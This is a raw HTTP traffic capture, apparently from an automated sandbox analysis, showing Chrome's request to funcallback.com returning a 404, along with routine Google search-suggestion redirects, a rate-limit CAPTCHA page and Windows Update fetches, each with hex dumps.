                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:34 UTC2172INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGJK2o7EGIjC3Mbc5FgtRK18iE4bs3zaJL5_7Phq4EutjNAAYHlySzdIKWr6kxiwcDv2cEr9t1qsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwIkrajsQYQtMuGtQISBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--W47cUAJgMF1soBb8B5qRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:34 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:12:34 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=J0cUNc3MAUqGT2s9VkFr_qO17Met8ZJyDr54BYowh3vczsHuRBV1NRxLQnljCU6Rdn09yGvVdVosmHyWtoXb5eNPz35XTswAJ_76roV8vY4Ot3DofMhD8l9reXrcs0uhN6dTdh8qenGTPzeYWIyv41NKY0GVUQWmmX4Ew8SQhD0; expires=Thu, 24-Oct-2024 10:12:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:12:34 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.164971352.165.165.26443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:35 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=c9UsdYNfmbzDR9B&MD=kM2l1z7B HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-04-24 10:12:35 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                      MS-CorrelationId: e680cb90-8eb8-4e35-8841-64228b9eb4ce
                                                                                                                                      MS-RequestId: b74ff388-3987-4ed1-9779-8ab04efa68a9
                                                                                                                                      MS-CV: 3d27vUounUyE+LUs.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:35 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 24490
                                                                                                                                      2024-04-24 10:12:35 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                      2024-04-24 10:12:35 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.164971631.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:35 UTC684OUTGET / HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:36 UTC273INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:36 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 147
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:12:36 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:12:36 UTC147INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.1649714142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:36 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:37 UTC2172INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGJW2o7EGIjAU1L_RxYWudeI86V8AGKeKfMmLlrdsuxmEeq70V3aj7ogSuF2qhg4943Yd42ws9qYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwIlbajsQYQ3J6d_QESBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JlSkGQblgruuYHmurlWISg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:37 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:12:37 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=FY9x9MpQU6KWY3CMBr7ImxQsuZYjEoJoo20-0TeSNd1FT4BUZU3O4jM8vA4XXfkomQQQK1T8mq3caE9Qe9aiOxYk7RXmIIV5Gx4v2OvioBZA_cY1Hlgsbh9pKwodwFJCP6JXob3usw6GF3xKfwixMyRsMspofGFDwFcw5pel9l0; expires=Thu, 24-Oct-2024 10:12:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:12:37 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.1649718142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:37 UTC815OUTGET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGJW2o7EGIjAU1L_RxYWudeI86V8AGKeKfMmLlrdsuxmEeq70V3aj7ogSuF2qhg4943Yd42ws9qYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:38 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:38 GMT
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                      Content-Length: 3511
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:12:38 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 3f 63 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/complete/search?client=chrome-omn
                                                                                                                                      2024-04-24 10:12:38 UTC1255INData Raw: 72 20 77 65 62 20 62 72 6f 77 73 65 72 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74
                                                                                                                                      Data Ascii: r web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recapt
                                                                                                                                      2024-04-24 10:12:38 UTC1255INData Raw: 76 69 6f 72 2e 20 54 68 69 73 20 70 61 67 65 20 63 68 65 63 6b 73 20 74 6f 20 73 65 65 20 69 66 20 69 74 27 73 20 72 65 61 6c 6c 79 20 61 20 68 75 6d 61 6e 20 73 65 6e 64 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 6e 6f 74 20 61 20 72 6f 62 6f 74 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 74 68 69 73 20 6e 65 74 77 6f 72 6b 2e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65
                                                                                                                                      Data Ascii: vior. This page checks to see if it's really a human sending the requests and not a robot coming from this network. <br><br><div id="infoDiv" style="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">This page appe
                                                                                                                                      2024-04-24 10:12:38 UTC102INData Raw: 74 3d 30 26 61 6d 70 3b 67 73 5f 72 6e 3d 34 32 26 61 6d 70 3b 73 75 67 6b 65 79 3d 41 49 7a 61 53 79 42 4f 74 69 34 6d 4d 2d 36 78 39 57 44 6e 5a 49 6a 49 65 79 45 55 32 31 4f 70 42 58 71 57 42 67 77 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: t=0&amp;gs_rn=42&amp;sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw<br></div></div></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.164971923.3.84.131443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:38 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-04-24 10:12:39 UTC467INHTTP/1.1 200 OK
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Server: ECAcc (sac/2518)
                                                                                                                                      X-CID: 11
                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                      X-Ms-Region: prod-eus-z1
                                                                                                                                      Cache-Control: public, max-age=247826
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:39 GMT
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.1649720142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:39 UTC674OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Ffuncallback.com&oit=3&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.164972123.3.84.131443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:39 UTC239OUTGET /fs/windows/config.json HTTP/1.1
